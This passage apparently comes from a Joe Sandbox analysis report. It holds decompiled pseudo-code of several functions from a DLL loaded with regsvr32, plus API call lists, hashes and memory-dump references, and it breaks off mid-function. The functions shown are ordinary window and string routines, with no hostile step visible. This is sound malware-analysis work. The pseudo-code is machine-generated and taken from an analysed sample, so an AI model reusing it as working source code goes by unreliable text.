Part of subcall function 10043D2F: PeekMessageA.USER32(00000000,00000000,0000000F,0000000F,00000000), ref: 10043D70
Part of subcall function 10043D2F: SetRectEmpty.USER32(?), ref: 10043D94
Part of subcall function 10043D2F: GetDesktopWindow.USER32 ref: 10043DAC
Part of subcall function 10043D2F: LockWindowUpdate.USER32(?), ref: 10043DBD
Part of subcall function 10043D2F: GetDCEx.USER32 ref: 10043DD4

Part of subcall function 1000C15D: GetModuleHandleA.KERNEL32(GDI32.DLL,?,10044440), ref: 1000C165
Part of subcall function 1000C15D: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 1000C171

GetWindowRect.USER32 ref: 10044466

Part of subcall function 1000C193: GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,1004444D,00000000), ref: 1000C19C
Part of subcall function 1000C193: GetProcAddress.KERNEL32(00000000,SetLayout,?,?,1004444D,00000000), ref: 1000C1AA

InflateRect.USER32 ref: 10044558
InflateRect.USER32 ref: 100446FE

Part of subcall function 10043B94: OffsetRect.USER32 ref: 10043BCB

Part of subcall function 10043F4D: OffsetRect.USER32 ref: 10043F76
Part of subcall function 10043F4D: OffsetRect.USER32 ref: 10043F80
Part of subcall function 10043F4D: OffsetRect.USER32 ref: 10043F8A
Part of subcall function 10043F4D: OffsetRect.USER32 ref: 10043F94

Part of subcall function 100442FE: GetCapture.USER32 ref: 1004430F
Part of subcall function 100442FE: SetCapture.USER32(?), ref: 1004431F
Part of subcall function 100442FE: GetCapture.USER32 ref: 1004432B
Part of subcall function 100442FE: GetMessageA.USER32 ref: 10044345
Part of subcall function 100442FE: DispatchMessageA.USER32 ref: 10044377
Part of subcall function 100442FE: GetCapture.USER32 ref: 100443D5

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$Offset$Capture$MessageWindow$AddressHandleInflateModuleProc$DesktopDispatchEmptyLockPeekUpdate
String ID:
API String ID: 1062258019-0
Opcode ID: 67f520f56967a2ed91aaeee5dd87e8751fe0b00d6e60048abf72591966aa5ee6
Instruction ID: 033dee92a02667b33d4f71786534c4978ee569dc66ecec565995e3ee7b1f86bc
Opcode Fuzzy Hash: 67f520f56967a2ed91aaeee5dd87e8751fe0b00d6e60048abf72591966aa5ee6
Instruction Fuzzy Hash: 43B16D75900619EFDF01DFA4C881EEE7BBAEF4A310F114194FD05AB255DA71AD44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10043FFD Relevance: 9.1, APIs: 6, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E10043FFD(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _t81;
				int _t83;
				int _t90;
				intOrPtr _t92;
				intOrPtr _t111;
				int _t125;
				void* _t134;
				void* _t139;
				intOrPtr _t143;
				void* _t145;
				void* _t149;

				_t145 = __edi;
				_t134 = __ecx;
				_t81 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t139 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_t143 =  *((intOrPtr*)(__ecx + 0x8c));
				_t149 = 2;
				if(_t143 == 0xa) {
					L7:
					 *((intOrPtr*)(_t134 + 0x28)) =  *((intOrPtr*)(_t134 + 0x28)) + _t81;
					L9:
					_t83 =  *((intOrPtr*)(_t134 + 0x30)) -  *((intOrPtr*)(_t134 + 0x28));
					__eflags = _t83;
					L10:
					if(_t83 < 0) {
						_t83 = 0;
					}
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x68)))) + 0x138))( &_v12, _t83, _t149, _t145);
					_v44.left = GetSystemMetrics(0x4c);
					_v44.top = GetSystemMetrics(0x4d);
					_v44.right = GetSystemMetrics(0x4e) + _v44.left;
					_t90 = GetSystemMetrics(0x4f);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v44.bottom = _t90 + _v44.top;
					_t92 =  *((intOrPtr*)(_t134 + 0x8c));
					asm("movsd");
					if(_t92 == 0xa || _t92 == 0xc) {
						_v28.left =  *((intOrPtr*)(_t134 + 0x58)) -  *((intOrPtr*)(_t134 + 0x60)) - _v12 + _v28.right;
						_v28.top =  *((intOrPtr*)(_t134 + 0x5c)) -  *((intOrPtr*)(_t134 + 0x64)) - _v8 + _v28.bottom;
						__eflags = IntersectRect( &_v60,  &_v44,  &_v28);
						if(__eflags != 0) {
							 *((intOrPtr*)(_t134 + 0x38)) =  *((intOrPtr*)(_t134 + 0x40)) - _v12;
							_t111 =  *((intOrPtr*)(_t134 + 0x44)) - _v8;
							__eflags = _t111;
							 *((intOrPtr*)(_t134 + 0x3c)) = _t111;
							 *(_t134 + 0x48) = _v28.left;
							 *((intOrPtr*)(_t134 + 0x4c)) = _v28.top;
						}
					} else {
						_v28.right =  *((intOrPtr*)(_t134 + 0x60)) -  *((intOrPtr*)(_t134 + 0x58)) + _v28.left + _v12;
						_v28.bottom =  *((intOrPtr*)(_t134 + 0x64)) -  *((intOrPtr*)(_t134 + 0x5c)) + _v28.top + _v8;
						_t125 = IntersectRect( &_v60,  &_v44,  &_v28);
						_t162 = _t125;
						if(_t125 != 0) {
							 *((intOrPtr*)(_t134 + 0x40)) =  *((intOrPtr*)(_t134 + 0x38)) + _v12;
							 *((intOrPtr*)(_t134 + 0x44)) =  *((intOrPtr*)(_t134 + 0x3c)) + _v8;
							 *((intOrPtr*)(_t134 + 0x50)) = _v28.right;
							 *((intOrPtr*)(_t134 + 0x54)) = _v28.bottom;
						}
					}
					 *((intOrPtr*)(_t134 + 4)) = _a4;
					 *((intOrPtr*)(_t134 + 8)) = _a8;
					return E10043DEE(_t134, _t162, 0);
				}
				if(_t143 == 0xb) {
					__eflags = _t143 - 0xa;
					if(_t143 != 0xa) {
						_t14 = __ecx + 0x30;
						 *_t14 =  *((intOrPtr*)(__ecx + 0x30)) + _t81;
						__eflags =  *_t14;
						goto L9;
					}
					goto L7;
				} else {
					_t149 = 0x22;
					if(_t143 != 0xc) {
						_t8 = __ecx + 0x34;
						 *_t8 =  *((intOrPtr*)(__ecx + 0x34)) + _t139;
						__eflags =  *_t8;
					} else {
						 *((intOrPtr*)(__ecx + 0x2c)) =  *((intOrPtr*)(__ecx + 0x2c)) + _t139;
					}
					_t83 =  *((intOrPtr*)(_t134 + 0x34)) -  *((intOrPtr*)(_t134 + 0x2c));
					goto L10;
				}
			}

0x10043ffd
0x10044007
0x1004400f
0x10044015
0x10044017
0x10044022
0x10044023
0x10044047
0x10044047
0x1004404f
0x10044052
0x10044052
0x10044055
0x10044057
0x10044059
0x10044059
0x10044067
0x10044079
0x10044080
0x1004408a
0x1004408d
0x10044098
0x10044099
0x1004409a
0x1004409b
0x1004409e
0x100440a7
0x100440a9
0x10044110
0x1004411f
0x10044134
0x10044136
0x1004413e
0x10044144
0x10044144
0x10044147
0x1004414d
0x10044153
0x10044153
0x100440b0
0x100440bc
0x100440cb
0x100440da
0x100440e0
0x100440e2
0x100440ea
0x100440f3
0x100440f9
0x100440ff
0x100440ff
0x100440e2
0x10044159
0x10044163
0x1004416e
0x1004416e
0x10044028
0x10044042
0x10044045
0x1004404c
0x1004404c
0x1004404c
0x00000000
0x1004404c
0x00000000
0x1004402a
0x1004402f
0x10044030
0x10044037
0x10044037
0x10044037
0x10044032
0x10044032
0x10044032
0x1004403d
0x00000000
0x1004403d

APIs

GetSystemMetrics.USER32 ref: 10044075
GetSystemMetrics.USER32 ref: 1004407C
GetSystemMetrics.USER32 ref: 10044083
GetSystemMetrics.USER32 ref: 1004408D
IntersectRect.USER32(?,?,?), ref: 100440DA
IntersectRect.USER32(?,?,?), ref: 1004412E

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: MetricsSystem$IntersectRect
String ID:
API String ID: 1124862357-0
Opcode ID: 3b0aa6f9faa56136fe567557d11243fb8cf2b5c990d1912d651e0cfb982aeed5
Instruction ID: 917d11f897bfa57f403c9ec645025f4c5d4c3deac5c3f87a3aea9b27b5094f21
Opcode Fuzzy Hash: 3b0aa6f9faa56136fe567557d11243fb8cf2b5c990d1912d651e0cfb982aeed5
Instruction Fuzzy Hash: 91516672A00209DFCF54DFA8C5C5A9E7BF5FF08350F1545A5EA09EB24AE634E980CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1003E699 Relevance: 9.1, APIs: 6, Instructions: 126
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E1003E699(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v17;
				char _v18;
				signed int _v19;
				char _v28;
				long _v32;
				signed int _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t43;
				signed int _t50;
				signed char _t57;
				void* _t68;
				void* _t86;
				intOrPtr* _t87;
				intOrPtr* _t88;
				signed int _t89;

				_t86 = __edx;
				_t43 =  *0x100b9e70; // 0x6fb3f782
				_v8 = _t43 ^ _t89;
				_t87 = _a8;
				_t88 = __ecx;
				_push( &_v28);
				_push(_a4);
				_push(0x417);
				 *((intOrPtr*)( *__ecx + 0x110))();
				 *(_t87 + 8) =  *(_t87 + 8) ^ 0x00000004;
				_v18 = 0;
				_v17 = 0;
				 *((char*)(_t87 + 0xa)) = 0;
				 *((char*)(_t87 + 0xb)) = 0;
				if(L1004A7B7(_t87,  &_v28, 0x14) != 0) {
					_t50 = E100177F8(_t88);
					_t69 = _t50;
					_v36 = _t50;
					E1001782C(_t88, 0x10000000, 0, 0);
					 *((intOrPtr*)( *_t88 + 0x110))(0x416, _a4, 0, _t68);
					if( *((intOrPtr*)(_t87 + 0x10)) < 0xffffffff) {
						_v32 = SendMessageA( *(_t88 + 0x20), 0x43d, 0, 0);
						SendMessageA( *(_t88 + 0x20), 0xb, 0, 0);
						SendMessageA( *(_t88 + 0x20), 0x43c, _v32 + 1, 0);
						SendMessageA( *(_t88 + 0x20), 0x43c, _v32, 0);
						SendMessageA( *(_t88 + 0x20), 0xb, 1, 0);
						 *((intOrPtr*)(_t87 + 0x10)) =  *((intOrPtr*)(_t87 + 0x10)) + 0xf4240;
						_t69 = _v36;
					}
					 *((intOrPtr*)( *_t88 + 0x110))(_a4, _t87);
					E1001782C(_t88, 0, _t69 & 0x10000000, 0);
					_t57 =  *((intOrPtr*)(_t87 + 9));
					_t68 = 0x415;
					if(((_t57 ^ _v19) & 0x00000001) != 0 || (_t57 & 0x00000001) != 0 &&  *_t87 != _v28) {
						_push(1);
						_push(0);
						goto L9;
					} else {
						_push( &_v52);
						_push(_a4);
						_push(0x41d);
						if( *((intOrPtr*)( *_t88 + 0x110))() != 0) {
							_push(1);
							_push( &_v52);
							L9:
							_t48 = InvalidateRect( *(_t88 + 0x20), ??, ??);
						}
					}
				}
				return E1004763E(_t48, _t68, _v8 ^ _t89, _t86, _t87, _t88);
			}

0x1003e699
0x1003e69f
0x1003e6a6
0x1003e6ab
0x1003e6ae
0x1003e6b5
0x1003e6b6
0x1003e6bb
0x1003e6c0
0x1003e6c6
0x1003e6d1
0x1003e6d5
0x1003e6d9
0x1003e6dd
0x1003e6eb
0x1003e6f4
0x1003e6fd
0x1003e706
0x1003e709
0x1003e71c
0x1003e726
0x1003e745
0x1003e748
0x1003e759
0x1003e768
0x1003e773
0x1003e775
0x1003e77c
0x1003e77c
0x1003e78c
0x1003e79f
0x1003e7a4
0x1003e7ac
0x1003e7b0
0x1003e7df
0x1003e7e1
0x00000000
0x1003e7bd
0x1003e7c2
0x1003e7c3
0x1003e7c8
0x1003e7d5
0x1003e7d7
0x1003e7dc
0x1003e7e3
0x1003e7e6
0x1003e7e6
0x1003e7d5
0x1003e7b0
0x1003e7f9

APIs

Part of subcall function 100177F8: GetWindowLongA.USER32(?,000000F0), ref: 10017803

SendMessageA.USER32 ref: 1003E73A
SendMessageA.USER32 ref: 1003E748
SendMessageA.USER32 ref: 1003E759
SendMessageA.USER32 ref: 1003E768
SendMessageA.USER32 ref: 1003E773
InvalidateRect.USER32(?,00000000,00000001), ref: 1003E7E6

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$InvalidateLongRectWindow
String ID:
API String ID: 74886174-0
Opcode ID: 827346ad1f91414aa146f463bbb10db327099f6c7691194f7244797a1acd95c3
Instruction ID: d30088e821e30678c8b610df5a77cc83cd6e6cd6692d123265b1387941753b0c
Opcode Fuzzy Hash: 827346ad1f91414aa146f463bbb10db327099f6c7691194f7244797a1acd95c3
Instruction Fuzzy Hash: A6415C34640248BFEB11DB64CC96FEEBBB5FF08B50F104568FA556A2D1C7B1A940CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1001B3BD Relevance: 9.1, APIs: 6, Instructions: 115
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E1001B3BD(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t37;
				signed int _t54;
				intOrPtr _t57;
				long _t60;
				struct HWND__* _t63;
				CHAR* _t64;
				void* _t65;
				void* _t67;
				void* _t71;
				void* _t72;
				long _t73;
				void* _t74;
				void* _t75;
				signed int _t77;
				void* _t78;
				signed int _t79;
				void* _t81;

				_t71 = __edx;
				_t79 = _t81 - 0x9c;
				_t37 =  *0x100b9e70; // 0x6fb3f782
				 *(_t79 + 0x98) = _t37 ^ _t79;
				_t73 =  *(_t79 + 0xa4);
				_t77 = 0;
				 *((intOrPtr*)(_t79 - 0x80)) =  *((intOrPtr*)(_t79 + 0xa8));
				E1001B2DE(0);
				_t67 = _t72;
				_t63 = E1001B312(0, _t79 - 0x70);
				 *(_t79 - 0x7c) = _t63;
				if(_t63 !=  *(_t79 - 0x70)) {
					EnableWindow(_t63, 1);
				}
				 *(_t79 - 0x78) =  *(_t79 - 0x78) & _t77;
				GetWindowThreadProcessId(_t63, _t79 - 0x78);
				if(_t63 == 0 ||  *(_t79 - 0x78) != GetCurrentProcessId()) {
					L6:
					__eflags = _t73;
					if(__eflags != 0) {
						_t77 = _t73 + 0x78;
					}
					goto L8;
				} else {
					_t60 = SendMessageA(_t63, 0x376, 0, 0);
					if(_t60 == 0) {
						goto L6;
					} else {
						_t77 = _t60;
						L8:
						 *(_t79 - 0x74) =  *(_t79 - 0x74) & 0x00000000;
						if(_t77 != 0) {
							 *(_t79 - 0x74) =  *_t77;
							_t57 =  *((intOrPtr*)(_t79 + 0xb0));
							if(_t57 != 0) {
								 *_t77 = _t57 + 0x30000;
							}
						}
						if(( *(_t79 + 0xac) & 0x000000f0) == 0) {
							_t54 =  *(_t79 + 0xac) & 0x0000000f;
							if(_t54 <= 1) {
								_t24 = _t79 + 0xac;
								 *_t24 =  *(_t79 + 0xac) | 0x00000030;
								__eflags =  *_t24;
							} else {
								if(_t54 + 0xfffffffd <= 1) {
									 *(_t79 + 0xac) =  *(_t79 + 0xac) | 0x00000020;
								}
							}
						}
						_t96 = _t73;
						 *(_t79 - 0x6c) = 0;
						if(_t73 == 0) {
							_t64 = _t79 - 0x6c;
							_t73 = 0x104;
							__eflags = GetModuleFileNameA(0, _t64, 0x104) - 0x104;
							if(__eflags == 0) {
								 *((char*)(_t79 + 0x97)) = 0;
							}
						} else {
							_t64 =  *(_t73 + 0x50);
						}
						_push( *(_t79 + 0xac));
						_push(_t64);
						_push( *((intOrPtr*)(_t79 - 0x80)));
						_push( *(_t79 - 0x7c));
						_t74 = E10012602(_t64, _t67, _t73, _t77, _t96);
						if(_t77 != 0) {
							 *_t77 =  *(_t79 - 0x74);
						}
						if( *(_t79 - 0x70) != 0) {
							EnableWindow( *(_t79 - 0x70), 1);
						}
						E1001B2DE(1);
						_pop(_t75);
						_pop(_t78);
						_pop(_t65);
						return E1004763E(_t74, _t65,  *(_t79 + 0x98) ^ _t79, _t71, _t75, _t78);
					}
				}
			}

0x1001b3bd
0x1001b3be
0x1001b3cb
0x1001b3d2
0x1001b3e1
0x1001b3e7
0x1001b3ea
0x1001b3ed
0x1001b3f2
0x1001b3fd
0x1001b402
0x1001b405
0x1001b40a
0x1001b40a
0x1001b410
0x1001b418
0x1001b420
0x1001b445
0x1001b445
0x1001b447
0x1001b449
0x1001b449
0x00000000
0x1001b42d
0x1001b437
0x1001b43f
0x00000000
0x1001b441
0x1001b441
0x1001b44c
0x1001b44c
0x1001b452
0x1001b456
0x1001b459
0x1001b461
0x1001b468
0x1001b468
0x1001b461
0x1001b471
0x1001b479
0x1001b47f
0x1001b492
0x1001b492
0x1001b492
0x1001b481
0x1001b487
0x1001b489
0x1001b489
0x1001b487
0x1001b47f
0x1001b499
0x1001b49b
0x1001b49f
0x1001b4a6
0x1001b4a9
0x1001b4ba
0x1001b4bc
0x1001b4be
0x1001b4be
0x1001b4a1
0x1001b4a1
0x1001b4a1
0x1001b4c5
0x1001b4cb
0x1001b4cc
0x1001b4cf
0x1001b4dc
0x1001b4de
0x1001b4e3
0x1001b4e3
0x1001b4e9
0x1001b4f0
0x1001b4f0
0x1001b4f8
0x1001b506
0x1001b507
0x1001b50a
0x1001b517
0x1001b517
0x1001b43f

APIs

Part of subcall function 1001B312: GetParent.USER32(?), ref: 1001B365
Part of subcall function 1001B312: GetLastActivePopup.USER32(?), ref: 1001B374
Part of subcall function 1001B312: IsWindowEnabled.USER32(?), ref: 1001B389
Part of subcall function 1001B312: EnableWindow.USER32(?,00000000), ref: 1001B39C

EnableWindow.USER32(?,00000001), ref: 1001B40A
GetWindowThreadProcessId.USER32(?,?), ref: 1001B418
GetCurrentProcessId.KERNEL32(?,?), ref: 1001B422
SendMessageA.USER32 ref: 1001B437
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 1001B4B4
EnableWindow.USER32(?,00000001), ref: 1001B4F0

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID:
API String ID: 1877664794-0
Opcode ID: 31a5804d88825593c8e5a19e73390321cc22ec94f356a1a5629cb7ca7f31cdb2
Instruction ID: af1b9d0b361e8316da3ec2ee59257911741e438ffdcaf767e901d315e256d08a
Opcode Fuzzy Hash: 31a5804d88825593c8e5a19e73390321cc22ec94f356a1a5629cb7ca7f31cdb2
Instruction Fuzzy Hash: E0418D72A00A589FEB30CFB5CC85BDE7BA8EF05750F218119E9599B282DB70D9848F51

Uniqueness

Uniqueness Score: -1.00%

Function 100010EB Relevance: 9.1, APIs: 6, Instructions: 107
stringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E100010EB(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t26;
				void* _t36;
				void* _t37;
				void* _t44;
				void* _t45;
				WCHAR* _t62;
				intOrPtr _t63;
				CHAR* _t65;
				intOrPtr _t66;
				void* _t67;
				void* _t68;

				_t60 = __edx;
				_push(0x10);
				E100476B6(0x1008d7bb, __ebx, __edi, __esi);
				_t62 =  *(_t67 + 8);
				_t65 = 0;
				if((0 | _t62 != 0x00000000) == 0) {
					_push(0x80004005);
					L10001401(__ebx, __ecx, __edx, _t62, 0, _t67);
				}
				 *((intOrPtr*)(_t67 - 0x1c)) =  *0x100bb480();
				 *(_t67 - 0x18) = _t65;
				 *(_t67 - 4) = _t65;
				if(_t62 != _t65) {
					 *((intOrPtr*)(_t67 - 0x14)) = lstrlenW(_t62) + 1;
					_t44 = L10001357(_t67 - 0x14, lstrlenW(_t62) + 1, 2);
					_t68 = _t68 + 0xc;
					if(_t44 >= 0) {
						_t66 =  *((intOrPtr*)(_t67 - 0x14));
						_t76 = _t66 - 0x400;
						if(_t66 > 0x400) {
							L8:
							_t45 = L100012BC(0x400, _t67 - 0x18, _t60, _t62, __eflags, _t66);
						} else {
							_push(_t66);
							if(L10001492(0x400, _t60, _t62, _t66, _t76) == 0) {
								goto L8;
							} else {
								E10048380(_t66);
								_t45 = _t68;
							}
						}
						_t65 = L100010B4(_t45, _t62, _t66,  *((intOrPtr*)(_t67 - 0x1c)));
					}
				}
				CharLowerA(_t65);
				if(_t65 == 0) {
					L12:
					_t26 = 0;
				} else {
					 *((intOrPtr*)(_t67 - 0x14)) = lstrlenA(_t65) + 1;
					_t36 = L10001357(_t67 - 0x14, lstrlenA(_t65) + 1, 2);
					_t68 = _t68 + 0xc;
					if(_t36 >= 0) {
						_t63 =  *((intOrPtr*)(_t67 - 0x14));
						__eflags = _t63 - 0x400;
						if(__eflags > 0) {
							L16:
							_t37 = L100012BC(0x400, _t67 - 0x18, _t60, _t63, __eflags, _t63);
						} else {
							_push(_t63);
							__eflags = L10001492(0x400, _t60, _t63, _t65, __eflags);
							if(__eflags == 0) {
								goto L16;
							} else {
								E10048380(_t63);
								_t37 = _t68;
							}
						}
						_t26 = L10001398(_t37, _t65, _t63,  *((intOrPtr*)(_t67 - 0x1c)));
						_t62 =  *(_t67 + 8);
					} else {
						goto L12;
					}
				}
				L10001389(L1000146A(0x400, _t60, _t62, _t65, _t67, _t62, E100483AC(_t62) + 1, _t26), _t67 - 0x18);
				return E10047739(0x400, _t62, _t65);
			}

0x100010eb
0x10002663
0x1000266a
0x1000266f
0x10002674
0x1000267d
0x1000267f
0x10002684
0x10002684
0x1000268f
0x10002692
0x10002697
0x1000269f
0x100026ac
0x100026b3
0x100026b8
0x100026bd
0x100026bf
0x100026c2
0x100026c4
0x100026dc
0x100026e0
0x100026c6
0x100026c6
0x100026cf
0x00000000
0x100026d1
0x100026d3
0x100026d8
0x100026d8
0x100026cf
0x100026f0
0x100026f0
0x100026bd
0x100026f3
0x100026fb
0x1000271b
0x1000271b
0x100026fd
0x10002708
0x1000270f
0x10002714
0x10002719
0x1000271f
0x10002722
0x10002724
0x1000273c
0x10002740
0x10002726
0x10002726
0x1000272c
0x1000272f
0x00000000
0x10002731
0x10002733
0x10002738
0x10002738
0x1000272f
0x1000274b
0x10002750
0x00000000
0x00000000
0x00000000
0x10002719
0x10002769
0x10002778

APIs

__EH_prolog3_GS.LIBCMT ref: 1000266A
lstrlenW.KERNEL32(?), ref: 100026A2
__alloca_probe_16.LIBCMT ref: 100026D3
CharLowerA.USER32 ref: 100026F3
lstrlenA.KERNEL32(00000000), ref: 100026FE
__alloca_probe_16.LIBCMT ref: 10002733

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: __alloca_probe_16lstrlen$CharH_prolog3_Lower
String ID:
API String ID: 4116776509-0
Opcode ID: 5a022c767afc5c677e1437f3c1c43d33b4a290dcb827912ab606d17bf4cce7f0
Instruction ID: 9d19a7622eb91d1bd22a87b9170e79a4f7ecf615831e20b68bd4b81b2f6b7c65
Opcode Fuzzy Hash: 5a022c767afc5c677e1437f3c1c43d33b4a290dcb827912ab606d17bf4cce7f0
Instruction Fuzzy Hash: E031E27AD00125ABEB01EBA48C86AFF3768EF41780F110025FE05F714AEA346E42C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 100442FE Relevance: 9.1, APIs: 6, Instructions: 101
windowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E100442FE(void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct tagMSG _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t30;
				void* _t32;
				void* _t34;
				void* _t36;
				intOrPtr* _t37;
				void* _t41;
				intOrPtr _t53;
				void* _t54;
				void* _t56;
				void* _t57;
				void* _t58;
				intOrPtr* _t59;

				_t55 = __edx;
				_t51 = __ecx;
				_t56 = GetCapture;
				_t57 = __ecx;
				if(GetCapture() != 0) {
					L20:
					return 0;
				}
				E10013FEA(0, _t51, _t58, SetCapture( *( *((intOrPtr*)(_t57 + 0x68)) + 0x20)));
				if(E10013FEA(0, _t51, _t58, GetCapture()) !=  *((intOrPtr*)(_t57 + 0x68))) {
					L19:
					E10044171(0, _t57, _t69);
					goto L20;
				} else {
